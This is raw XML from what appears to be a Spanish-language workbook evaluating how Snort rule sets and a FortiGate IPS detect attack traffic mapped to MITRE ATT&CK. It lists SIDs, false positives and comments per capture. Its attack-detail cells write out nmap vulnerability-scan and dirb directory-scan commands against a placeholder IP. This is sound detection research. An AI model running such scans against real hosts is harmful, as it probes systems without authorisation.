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ms-office.chartex+xml" PartName="/xl/charts/chartEx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ms-office.chartstyle+xml" PartName="/xl/charts/style1.xml"/>
  <Override ContentType="application/vnd.ms-office.chartcolorstyle+xml" PartName="/xl/charts/colors1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.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14.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26.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25.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3.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29.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28.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5.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5.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart2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 - Reglas Usadas" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="(B) - Detecciones - Ataques" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="(C) - Detecciones - Tráfico Leg" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="(D) - Resultados II - Snort" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="(D) - Resultados I" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="(D) - Resultados III - FortiGat" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="(E) - Referencias" sheetId="7" r:id="rId10"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7564" uniqueCount="1562">
  <si>
    <t xml:space="preserve">     </t>
  </si>
  <si>
    <t>SNORT</t>
  </si>
  <si>
    <t>Nombre REGLA</t>
  </si>
  <si>
    <t>Descripción</t>
  </si>
  <si>
    <t>Versión</t>
  </si>
  <si>
    <t>Fecha</t>
  </si>
  <si>
    <t>RS1</t>
  </si>
  <si>
    <t>RS2</t>
  </si>
  <si>
    <t>RS3</t>
  </si>
  <si>
    <t>RS4</t>
  </si>
  <si>
    <t>Talos Community</t>
  </si>
  <si>
    <t>Las "Talos Community Rules" o reglas de la Comunidad han sido creadas por miembros de la comunidad de código abierto o integrantes de Snort. Estas reglas están disponibles para todos los usuarios de Snort y están controladas por GPLv2. Constituye un subconjunto de las Reglas "Talos Registered".</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>✔</t>
  </si>
  <si>
    <t>Talos Registered</t>
  </si>
  <si>
    <t>El paquete de reglas "Talos Registered" contiene más reglas que el paquete "Talos Community". Su naturaleza es similar.</t>
  </si>
  <si>
    <t>ETOpen</t>
  </si>
  <si>
    <t>Conjunto de reglas "Emerging Threats" alternativas a las reglas ofrecidas por Snort, pero igualmente compatibles. Este paquete constituye un subconjunto de las reglas optimizadas Emerging Threats (ETOpen Optimizada).</t>
  </si>
  <si>
    <t>ETOpen Optimizada</t>
  </si>
  <si>
    <t>Paquete de todas las reglas ofrecidas por Emerging Threats.</t>
  </si>
  <si>
    <t>FORTIGATE</t>
  </si>
  <si>
    <t>Nombre Reglas</t>
  </si>
  <si>
    <t>IPS Definitions</t>
  </si>
  <si>
    <t>IPS Engine</t>
  </si>
  <si>
    <t>Dispositivo</t>
  </si>
  <si>
    <t>FortiGate</t>
  </si>
  <si>
    <t>FortiGate dispone de un conjunto de reglas internas que se van actualizando conforme se van exportando nuevas versiones completas del producto</t>
  </si>
  <si>
    <t>Version 28.00824</t>
  </si>
  <si>
    <t>Version 7.00336</t>
  </si>
  <si>
    <t>FGVM02</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>TÁCTICA</t>
  </si>
  <si>
    <t>OTRAS TÁCTICAS</t>
  </si>
  <si>
    <t>ID TÁCTICA</t>
  </si>
  <si>
    <t>TÉCNICA</t>
  </si>
  <si>
    <t>ID TÉCNICA</t>
  </si>
  <si>
    <t>SUBTÉCNICA</t>
  </si>
  <si>
    <t>ID SUBTÉCNICA</t>
  </si>
  <si>
    <t>ATAQUE</t>
  </si>
  <si>
    <t>HERRAMIENTA</t>
  </si>
  <si>
    <t>FICHERO PCAP</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS</t>
  </si>
  <si>
    <t>Nº DE FLUJOS CON ATAQUE/S</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TOTALES</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) PRINCIPALES</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) COLATERALES</t>
  </si>
  <si>
    <t>DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>MECANISMO DE DETECCIÓN</t>
  </si>
  <si>
    <t>DETALLES DE IMPLEMENTACIÓN DE ATAQUE</t>
  </si>
  <si>
    <t>PROCESO DE GENERACIÓN DE PCAP</t>
  </si>
  <si>
    <t>VALIDACIÓN DE PCAP</t>
  </si>
  <si>
    <t>ANÁLISIS DE DETECCIONES DE PCAP (Snort)</t>
  </si>
  <si>
    <t>FORMATO PCAPNG</t>
  </si>
  <si>
    <t>DETECTABILIDAD</t>
  </si>
  <si>
    <t>ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>VERIFICACIÓN MTU MÁXIMA</t>
  </si>
  <si>
    <t>ERROR TCP_REPLAY</t>
  </si>
  <si>
    <t>CONTIENE SÓLO FLUJOS COMPLETOS CON SYN INICIAL</t>
  </si>
  <si>
    <t>SIDs (sin repetición)</t>
  </si>
  <si>
    <t>#SIDs</t>
  </si>
  <si>
    <t>Número total de alertas</t>
  </si>
  <si>
    <t>SIDs en legítimo y ataque</t>
  </si>
  <si>
    <t>SIDs sólo en ataque</t>
  </si>
  <si>
    <t>SIDs FP (Manual)</t>
  </si>
  <si>
    <t>SIDs FP (Automático)</t>
  </si>
  <si>
    <t>SIDs FP</t>
  </si>
  <si>
    <t>SIDs FP "No Relacionados"</t>
  </si>
  <si>
    <t>SIDs FP "Eventos de Red"</t>
  </si>
  <si>
    <t>SIDs TP "Todas las Alertas"</t>
  </si>
  <si>
    <t>SIDs TP "Algunas Alertas"</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS DETECTADOS</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN</t>
  </si>
  <si>
    <t>SIDS sólo en ataque</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S DETECTADOS</t>
  </si>
  <si>
    <t>COMENTARIOS DE LAS DETECCIONES</t>
  </si>
  <si>
    <t>Attackids (sin repetición)</t>
  </si>
  <si>
    <t>#Attackid</t>
  </si>
  <si>
    <t>SIDs FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>#SIDs FP Dataset_Legítimo_TD</t>
  </si>
  <si>
    <t>SIDs FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>#SIDs FP Dataset_Legítimo_Basico</t>
  </si>
  <si>
    <t>SIDs FP Totales</t>
  </si>
  <si>
    <t>#SIDs FP Totales</t>
  </si>
  <si>
    <t>Nº FLUJOS IDENTIFICADOS POR FORTIGATE</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR FORTIGATE</t>
  </si>
  <si>
    <t>% DETECCIÓN FORTIGATE</t>
  </si>
  <si>
    <t>USADO PARA CÁLCULO DE CAPACIDAD DE DETECCIÓN</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>TA0043</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Escaneo de vulnerabilidades</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>T1595.002-Port_Scanning_[3].pcapng</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de paquetes TCP con flag SYN activado a varios puertos diferentes</t>
  </si>
  <si>
    <t>Ejecución de comando nmap para escaneo de puertos y detección de vulnerabilidades (nmap -sV --script vulscan IP)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.2</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.5</t>
  </si>
  <si>
    <t>✘</t>
  </si>
  <si>
    <t>1421, 1418</t>
  </si>
  <si>
    <t>1418, 1421</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010937, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1421, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1418, 2023753, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, 2034730, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002911, 2010935, 2002910</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1421, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1418, 2023753,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xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2013409, 2034730, 2034718, 2023753</t>
  </si>
  <si>
    <t>2010939, 1421, 2010936, 1418, 2018317, 2009358, 2024364</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1421, 1418, 44484, 44487, 44485, 44489, 41807, 49040, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2023753, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034730</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2009358, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002911, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2023753, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034730</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2009358, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 44484, 44485, 44487, 44489, 50447</t>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718</t>
  </si>
  <si>
    <t>44484, 44485, 44487, 44489, 50447</t>
  </si>
  <si>
    <t>1421, 1418, 41807, 2010939, 2010936, 2023753, 2018317, 2009358, 2024364</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2010937, 2001689, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939, 2010935,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2100472, 2100615, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">010936, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101418, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">006408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">044666, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2023753, 2007571, 2003099, 20</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>18317, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>034718, 2013409, 2034730, 200</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>9358, 20</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24364, 1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2100472, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001689, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939, 2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101418, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006408</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2023753, 2007571, 2003099, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, 2034730, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447</t>
    </r>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615, 44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418</t>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615</t>
  </si>
  <si>
    <t>44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418</t>
  </si>
  <si>
    <t>2010937, 2001689, 2002911, 2010939, 2010935, 2002910, 2010936, 2044666, 2023753, 2018317, 2009358, 2024364, 1421, 1418, 41807</t>
  </si>
  <si>
    <t>El ataque consiste en la ejecución de un comando nmap que escanea los 1000 puertos más comunes. Snort detecta que se esta realizando un analisis con nmap de puertos (SID 2009358) . Además, detecta posibles escaneo en diferentes rangos de puertos. Ejemplo: SID 2002910. Para el caso de FortiGate,  sólo saltan 19 alertas, cada una avisando de un intento de descubrimiento de puerto particular</t>
  </si>
  <si>
    <t>43814, 45360</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Escaneo de página web</t>
  </si>
  <si>
    <t>Dirb</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning1_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte peticiones HTTP hacia muchas URLs diferentes con destino el mismo servidor</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">Ejecucion de comando dirb para escaneo de la estructura de directorios (dirb </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://IP</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> -w /usr/share/dirb/wordlist/vulns/apache.txt)</t>
    </r>
  </si>
  <si>
    <t>Manual [2] /   3.1.1.1</t>
  </si>
  <si>
    <t>Manual [2]</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009004,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2011085, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2012885,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749</t>
  </si>
  <si>
    <t>2009004, 2011085, 2012885, 31939, 50447</t>
  </si>
  <si>
    <t xml:space="preserve">El diccionario utilizado comprueba 101 rutas diferentes. </t>
  </si>
  <si>
    <t>GoBuster</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning2_[3].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Ejecucion de comando GoBuster para escaneo de la estructura de directorios </t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.5</t>
  </si>
  <si>
    <t>1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853,  43290, 887</t>
  </si>
  <si>
    <t>1434,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129, 2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
